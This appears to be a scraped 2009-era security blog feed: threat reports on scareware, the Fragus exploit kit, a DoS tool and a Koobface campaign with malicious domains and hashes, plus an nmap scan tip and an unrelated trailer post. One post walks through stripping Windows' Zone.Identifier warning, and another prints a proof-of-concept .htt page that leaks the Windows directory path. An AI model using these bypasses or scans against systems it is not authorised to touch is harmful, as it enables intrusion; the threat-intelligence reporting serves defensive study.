Anti-Virus Live 2010. Talking with the enemy

Generally one has the false belief that malicious code is trivial that any technical problems solved by just formatting the system or acquire any of the known anti-malware market offers today.

However, on the one hand, the reality is that behind the development of malware hides a very large business in which every day must be added more "associates". Moreover, what happens when we plan to buy this antivirus is just the opposite.

This is the case of the Anti-Virus Live 2010 or what is the same, Anti-Virus Elite 2010 malware scareware type (or rogue), which makes it quite evident that the processes and mechanisms by which deceives order to steal your money are well oiled and well thought out.

At first instance, as is usual in this type of threat, the strategy is supported by a website that is used to "bait" to lure potential victims, saying all sorts of justifications to "prove" some credibility on the false antivirus, which complements a typical disinformation campaign.

So far, nothing interesting. Except for the possibility of requesting assistance via chat. Interesting. Then check if this condiment is legitimate ... Yes it's.

Consequently, communication was established through this option with the surprise that immediately got response from the other side. You can then take the short conversation via chat.

We basically said Dennis, the merchant, which among other things the course antivirus is compatible with all versions of Windows, its value is USD 27, which only supports English and no enterprise version and no problems eliminating conficker.

Let us briefly discuss these points. Obviously, the scareware must be compatible with all versions of Windows as it's this time the audience that the threat is directed. Why? Simply because more than 80% of people use Windows as the main operating system in home environments where the potential for finding a particular victim increases. This way is much more likely "to close business."

For the same reason there isn't version for GNU/Linux, even, not even version oriented businesses; because usually, the companies have a higher level of security where probably the scareware not find results.

Why English and not Russian? Because English is the third most popular language. Its cost, USD 27, represents a competitive value that's commensurate with the average cost of legitimate antivirus programs. And regarding conficker, whether by koobface wondering, the answer would have been the same.

A very interesting fact that helps to understand its true magnitude of the illegal business of malware, is the error committed by the "affiliate" Dennis when requesting the URL to buy a false solution. It gives us the url registryfix.com/purchase and time of comment that is not in question the supposed solution, offering the proviso antivirus-elite.com/purchase the corresponding url.

However, we were trying to close "business" by Anti-Virus Live 2010 and not Anti-Virus Elite 2010, making it clear that this is the same threat under different names. Even the same "partner" manages and markets various alternatives under similar mode. In this case, also offering the fraudulent sale of Registry Fix, another associated with NoAdware and scareware ErrorClean.

From a technical point of view, the domain of this threat is in the IP address 204.232.131.12, hosted by the ISP Rackspace, located in the city of Hoboken in the United States under AS27357.

According to the history of this AS, the activities generated by malicious code are important

From the website you download an executable named setup.exe (MD5: C50DC619E13345DEC2444B0DE371DFD4) which corresponds to scareware installer with a low rate of detection.

As we see, the cybercriminals don't get tired of spreading increasingly aggressive threats that accompany the infection process through marketing campaigns, even very similar to those used by many antivirus companies.

Related information
A recent tour of scareware XIX
Green IT utilizado para la propagación de scarewar...
Scareware. Repositorio de malware In-the-Wild
Scareware. Estrategia de engaño propuesta por Personal Antivirus
Campaña de propagación del scareware MalwareRemovalBot

Jorge Mieres
Malware Intelligence Blog

RussKill. Application to perform denial of service attacks

Conceptually speaking, a DoS attack (Denial of Service attack) is basically bombarded with requests for a service or computer resource to saturate and the system can not process more data, so those resources and services are inaccessible, "denying" the access to anyone who wants them.

From the standpoint of computer security, Denial of Service attacks are a major problem because many botnets are designed to automate these attacks, especially those of particular purpose, taking advantage of computational power offered by the network of zombies. In this case, the attack is called Distributed Denial of Service (DDoS).

Moreover, under the framework of the concept of cyberwarfare, this type of attack is part of the armament "war" through which virtual scenarios presented conflicts between their requirements as to neutralize a state vital services.

RussKill is a web application that is classified within these activities and that despite being extremely simple, both in functionality and in the way of use, is an attack that could be very effective and difficult to detect.

As is customary in the current crimeware, the web application is of Russian origin and has a number of fields with information about how and against whom to carry out the attack, letting you configure the packet sequence, ie the flow in amount. The option "Hide url" is a self-defensive measure designed to ensure that the server is detected.

Although several methods of DoS attacks, RussKill makes use of the attacks HTTP-flood and SYN-flood. In both cases the servers for flood victims through http requests and packets with fake source IP addresses respectively.

As I said at first, the denial of service attacks are a danger for any information system, regardless of the platform that supports services and applications such, in this case site, demonstrates the ease with which an attack of this type can run.

Related information
DDoS Botnet. New crimeware particular purpose

Jorge Mieres
Pistus Malware Intelligence

Using Nmap Remotely Through F5 FirePass VPN

Well, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.

I was connected to a network remotely through the company's F5 VPN appliance and I wanted to scan the internal network.

It looked like:

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 192.168.1.*

Once I pressed "Enter" I got:

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard Time

WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won't work on Windows.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 5 seconds then retry.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 25 seconds then retry.

Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening adapter: The system cannot find the device specified. (20)

There are several possible reasons for this, depending on your operating system:

LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.

*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV ; or use mknod).

*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2. Depending on the reason for this error, it is possible that the -- unprivileged command-line argument will help.

SOLARIS: If you are trying to scan localhost or the address of an interface and are getting '/dev/lo0: No such file or directory' or 'lo0: No DLPI device found', complain to Sun. I don't think Solar is can support advanced localhost scans. You can probably use "-PN -sT localhost" though.

QUITTING!

Then I realized that the VPN connection was a PPP device which is probably at the top of the device type interfaces order list and Nmap is trying to use it in order to scan, which is the point of failure because Nmap on Windows without RAW sockets (means Windows XP SP2+) can only use Ethernet devices. So I try played "Imaginary Linux on Windows" and added the option "-e eth0" which specifies using the Ethernet device indexed at 0 and it worked like a charm.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 -e eth0 192.168.1.*

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time

Interesting ports on XXXXX (192.168.0.1):

PORT STATE SERVICE

445/tcp filtered microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

Bypassing Windows Unknown Publisher Verification For Web Downloaded Executables

I was in another day of jumping from a client to a client, securing another bank in Israel when my girlfriend called and said "Honey, I am at the office, I have absolutely nothing to do and I can't connect from here to our computer at home to continue my project". I said, O.K, let's see what we can do on a 5 minute phone call. Now just want to make it clear, my girlfriend is an Information System Instructor, she is no developer or hacker.

Me: "Honey, go to http://www.teamviewer.com, can you download it?"

Her: "yes, but when I run the setup.exe it says something weired like 'windows has blocked this software because it can't verify the publisher' and it won't let me install"

Me: "O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start->Run. Now add ':Zone.Identifier' just before the last quotes. What do you see?"

Her: "I see something like ZoneId=3, now what?"
Me: "I can't talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye"

After 10 minutes I get an SMS "thanks honey it worked!!!".

Well we found a bug, I wouldn't really call it a "Privilege Escalation" but I guess you don't have to be a hacker to bypass windows security restrictions :)

Fusion. A concept adopted by the current crimeware II

It's increasingly common for research processes we find that on the same server are housed, "operating" actively, several crimeware Exploit Pack type from which control and manage the zombies that are part of his fraudulent business .

A while ago we commented on ElFiesta and ZeuS coexisting in the same environment, and meet the same objectives.

This time, the merger is between Fragus (an increasingly popular crimeware) and ElFiesta. Both packages are hosted on the same server. However, although the potential doesn't mean they are being operated by the same botmaster.

The domain in which they are staying is as follows:

Where is in Fragus http://hotgirldream.net/far/ and ElFiesta for, is hosted on another folder, the path is http://hotgirldream.net/content/. As we can see, share the server with IP address 210.51.166.233, located in Yizhuang Idc Of China Netcom, Beijing.

This demonstrates that opportunities for "business" don't go only by the sale of crimeware, malware, exploit pack and other fraudulent activities, but another alternative is to provide the infrastructure for, in terms of its computing capacity, streamline processes criminal.

Related information
Fusión. Un concepto adoptado por el crimeware actual
Fragus. New botnet framework In-the-Wild
ZeuS and power Botnet zombie recruitment
ElFiesta. Recruitment zombie across multiple threa...

Jorge Mieres
Pistus Malware Intelligence

Disinformation campaign to spread malware

Disinformation is basically distort or manipulate the information so that the recipient end believing something completely untrue, and which the originator obtains an advantage. For example, the rumor is a tool used in the campaigns of disinformation. In turn, misinformation is a tool that provides useful information in a timely manner (Intelligence).

Transferred this concept to the computer field, is neither more nor less than a social engineering methodology that increasingly used by developers of malicious code to try to attract the confidence of users and thus take advantage of this condition to execute the process of infection.

Usually we see on the pages scareware rate spread malware (also known as rogue), where we find pictures of certifications such as Virus Bulletin and AV-Comparatives, or some other like PC Magazine or PC World that don't fulfill the same function as the magazine formerly known as they are enjoying "trust" among the public.

Another alternative is focusing its efforts on trying to prove that this "solution" (scareware) is the best. This is done through false compare where it gets questioned the detection levels of antivirus companies widely known in the market.

Both strategies of deception appeal to what is known under the concept of authority represented by these certificates and publications in the "real" antivirus and information technology respectively.

In this regard, I recently discovered another method of deception is also directed to issue disinformation with the aim of encouraging users to believe the information and act accordingly.

It's pretending that the file is provided free of malicious code, also appealing to authority, but in this case, enabling organizations to verify the integrity of files through an online process to submit the files to antivirus solutions with greater confidence in the market. For example, services such as VirusTotal or VirScan. We then see a catch.

The domains involved are housed in the IP 213.5.64.20, located in the Netherlands (Netherlands Altushost Inc) but not all spread the threat. Among them:

safehostingsolutions.com/download.html
fileaddiction.com/download.html
freedatatransfer.com/download.html
freedownloadthanks.com/download.html
megasecuredownload.com/download.html
qualityupload.com/download.html

The files that are downloaded are the following names:

• Hpack Generator.exe (91b31ea8c551397cd5b1d38ec1aa98dd) - Result: 8/40 (20.00%)
• UAV Generator.exe – Idem
• Knight Generator.exe – Idem
• LG Generator.exe – Idem
• Kings Generator.exe – Idem
• DBlocks Generator.exe – (53e3256bef0352caf794b641f93a32d5) - Result: 6/40 (15%)

As can be seen that besides the new proposal for cheating despite being quite trivial has a high impact on effectiveness, the level of detection in the two malicious codes is very low, representing only 15% and 25% of 41 antivirus engines.

It isn't to panic but to be vigilant.

Related information
A recent tour of scareware XVIII
Inteligencia informática, Seguridad de la Información y Ciber-Guerra
Deception techniques that do not go out of style

Jorge Mieres
Pistus Malware Intelligence

A brief glance inside Fragus

Fragus is a web application developed for the management of zombies, of Russian origin, who long to live has been inserted crimeware clandestine market with an affordable price (USD 800) if we consider criminal capabilities it offers.

The crimeware is basically composed of five sections: Statistics, Files, Sellers, Traffic links and Preferences. Each handles a specific task and they all complement one another.

In the Files panel is handling the executable file that will spread.

Sellers are in management exploits. In this case, corresponding to the first version of Fragus.

Regarding the Traffic links module, allows the "previous" and setting the iframe script that will be injected into the page that shall act as "driver" for the implementation of the configurator exploits the previous panel, that look for vulnerabilities on the victim machine .

However, one of the patterns identified in each of the packages of this style is the Statistical module. This module provides the intelligence necessary for the botmaster get a detailed report of the teams not only zombies but also on certain aspects needed to know in detail what should exploit to run.

Another interesting patterns we can deduce on the basis of this information is that the operating system is exploited Windows XP with Internet Explorer, the exploit more effectively, despite being very old (MS06-014) is the one that takes the vulnerability in MDAC and that among the countries with the highest rates of infection are the USA and Korea.

This represents a common scenario where perhaps the relevance factor is the inference that perhaps common situation due to the large volume of user who uses the Microsoft operating system on a non-licensed, which leads to not update .

Finally, another important factor that must not be overlooked is that cyber-criminals are not interested in the controversy surrounding the safety levels offered by one or another operating system (Windows, GNU/Linux and Mac OS) but all fall into the same category of "potential victims" because the vulnerability exploited in layer 7.

Related information

Fragus. Nueva botnet framework In-the-Wild
JustExploit. Nuevo Exploit Kit que explota Java
DDoS Botnet. Nuevo crimeware de propósito particular
T-IFRAMER. Kit para la inyección de malware In-the-Wild
ZoPAck. Nueva alternativa para la explotación de vulnerabilidades
ZeuS Botnet y su poder de reclutamiento zombi
Eleonore Exploits Pack. Nuevo crimeware In-the-Wild
Liberty Exploit System. Otra alternativa (...) para el control de botnets

Jorge Mieres
Pistus Malware Intelligence

Exploiting WebView through Internet Explorer to remotely discover windows directory

As for any large product, Microsoft Windows operating system is built on its previous versions code. Some of this code even goes back until Microsoft Windows 98.

In Windows 98 a new look was introduced called "WebView" which included the way folders are displayed and the way the desktop is displayed are all HTML templates which were also editable to the default administrative user.You can read more about it here:http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx

Those HTML Templates had the extension "htt". In order for the folder templates to function properly and being able to display the current folder, a few automatically expended variables were added to the module filtering the "htt" files. These are:
%TEMPLATEDIR% (hardcoded)
%THISDIRPATH% (hardcoded)
%THISDIRNAME% (hardcoded)
%BACKGROUNDIMAGE% (registry)
%LOGOLINE% (registry)

This mechanism lives until today deeply inside Windows XP's code in two modules inside the system32 folder:
1) Webvw.dll
2) Mshtml.dll

Webvw.dll is the module which is responsible for all the Webview installation and normal activity and mshtml.dll is the main module for HTML Filtering & Rendering used Windows Explorer and Internet Explorer.

When Microsoft Windows is installed and webvw.dll is registered, it adds it CLSID and a few registry keys. The interesting ones are these:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\BACKGROUNDIMAGE
Default = "%SystemRoot%\Web\wvleft.bmp"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WebView\TemplateMacros\LOGOLINE
Default = "%SystemRoot%\Web\wvline.gif"

Every time an htt file is rendered, without any local-remote or any zone consideration, those variables are replaced with the current system's path.
This is the code inside mimeflt.cpp which contains the bug:Lines 360 to 433:

#define REG_WEBVIEW_TEMPLATE_MACROS
TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\WebView\\TemplateMacros")

void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch) {
 if (SIZEOF(char) == nCharSize) {
  SHAnsiToTChar((LPCSTR)pBuf, psz, cch);
 } else {
  ASSERT(nCharSize == SIZEOF(WCHAR));
  SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);
 }
}

void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize) {
 TCHAR szExpansion[MAX_PATH];
 szExpansion[0] = TEXT('\0');
 TCHAR szTCharMacro[MAX_PATH];

 ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));
 TCHAR szKey[MAX_PATH];
 lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));
 StrCatBuff(szKey, TEXT("\\"), ARRAYSIZE(szKey));
 StrCatBuff(szKey, szTCharMacro, ARRAYSIZE(szKey));
 HKEY hkMacros;
 if (RegOpenKey(HKEY_CURRENT_USER, szKey, &hkMacros) == ERROR_SUCCESS && RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &hkMacros) == ERROR_SUCCESS) {
  DWORD dwType;
  DWORD cbData = SIZEOF(szExpansion);
  SHQueryValueEx(hkMacros, NULL, NULL, &dwType, (LPBYTE)szExpansion, &cbData);
  RegCloseKey(hkMacros);
 }

 ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);
}

int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp) {
 if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {
  if (!_szTemplateDirPath[0]) {
   GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);
  }

  *ppszExp = _szTemplateDirPath;

 } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {
  if (!_szThisDirPath[0]) {
   _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));
  }
  *ppszExp = _szThisDirPath;

 } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {
  if (!_szThisDirName[0]) {
   _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));
  }
  *ppszExp = _szThisDirName;

 } else {
  ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);
  *ppszExp = _szExpansion;
 }

 return _StrLen(*ppszExp);
}

In Windows XP the variables "%THISDIRPATH%" and "%THISDIRNAME%" were removed from the Mime Filter which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% would still be translated into the current windows directory.

The Proof Of Concept code (Remote WebView Macro Translation):
Save on a remote host with an htt extension and replace "http:///filter_trap.htt
--------------------------- filter_trap.htt start --------------------------------
[div id="BACKGROUNDIMAGE"]%BACKGROUNDIMAGE%[/div]
[div id="LOGOLINE"]%LOGOLINE%[/div]
[div id="TEMPLATEDIR"]%TEMPLATEDIR%[/div]
[script]
alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);
alert(document.getElementById("LOGOLINE").innerHTML);
alert(document.getElementById("TEMPLATEDIR").innerHTML);
[/script]
--------------------------- filter_trap.htt end --------------------------------

Koobface campaign spread through Blogspot

A massive campaign to spread the worm is Koobface In-the-Wild using blogs as a strategy generated from the Blogspot service.

Koobface has become a nightmare for social networks and even though its propagation strategies do not change, this malware is almost two years of activity with a significant rate of infection, making it one of the largest botnets today.

Blogspot domains used as cover for the spread are:

pannullonumair.blogspot.com
haladynalatosha.blogspot.com
macdougalmuskan.blogspot.com
mailletjamaica.blogspot.com
ledrewrooney.blogspot.com
brasenoktayoktay.blogspot.com
toludestany.blogspot.com
edgarbillison.blogspot.com
piotrowiczlyanne.blogspot.com
brochoiredeedee.blogspot.com
decuyperantohny.blogspot.com
derrenpassini.blogspot.com
elsenelsenumthun.blogspot.com
elsyelsysalah.blogspot.com
fanjonappuappu.blogspot.com
fredrikadantos.blogspot.com
genelleabril.blogspot.com
gilkerharjyot.blogspot.com
hadzilashawn.blogspot.com
insalacotecwyn.blogspot.com
janitasaels.blogspot.com
jodelinscheufler.blogspot.com
jones-allentammey.blogspot.com
jurgisbooty.blogspot.com
karanjeetisoardi.blogspot.com
dralleboyeboye.blogspot.com
maidenhermann.blogspot.com
messer-bustamantetimpriss.blogspot.com
murachaniananoushka.blogspot.com
nevnevsculthorpe.blogspot.com
parrisvistisen.blogspot.com
porierkunlekunle.blogspot.com
rotermundraimon.blogspot.com
sharonyacorvil.blogspot.com
sodorabardan.blogspot.com
tendaiblunk.blogspot.com
turskeybrianna.blogspot.com
zhuochengbate-pelletier.blogspot.com
ziziziziboyter.blogspot.com

Who accesses one of these domains redirected to a page that simulates the typical YouTube screen. We then see a catch.

Immediately after, try to download a binary called "setup.exe" (md5 6d8ac41c64137c91939cced16cb5f2fe) which has a low average detection rate. This binary, in turn takes care of downloading and executing other malicious code.

• v2prx.exe (36/41 - 87.80%)
• go.exe (7/41 - 17.07%)
• fb.75.exe (22/41 - 53.66%)
• v2newblogger.exe (36/41 - 87.80%)
• v2captcha.exe (39/41 - 95.12%)
• v2googlecheck.exe (40/41 - 97.56%)

Each of these files are downloaded from domains Style "homemadesandwiches.com/.sys/?getexe=ff2ie.exe".

The binary v2captcha.exe handles breaking the captcha that asks for registration blogspot blogs, creating massive randomly and the same, and then redirected to the download of Koobface through, as I mentioned at the beginning, a false YouTube page that uses the same visual social engineering approach used in other campaigns similar spread.

Undoubtedly Koobface is another malicious code that uses persistence despite many of its variants are detected by most antivirus companies.

Related information
Symbiosis malware present. Koobface

Jorge Mieres
Pistus Malware Intelligence

Avatar - The Movie - HD Trailer 1080p

This seems to be like a very nice and well made movie. Looking at the trailer, I thought that I should share it with our blog viewers.

Enjoy the Trailer! Copyrights Reserved to the Movie Makers!

EF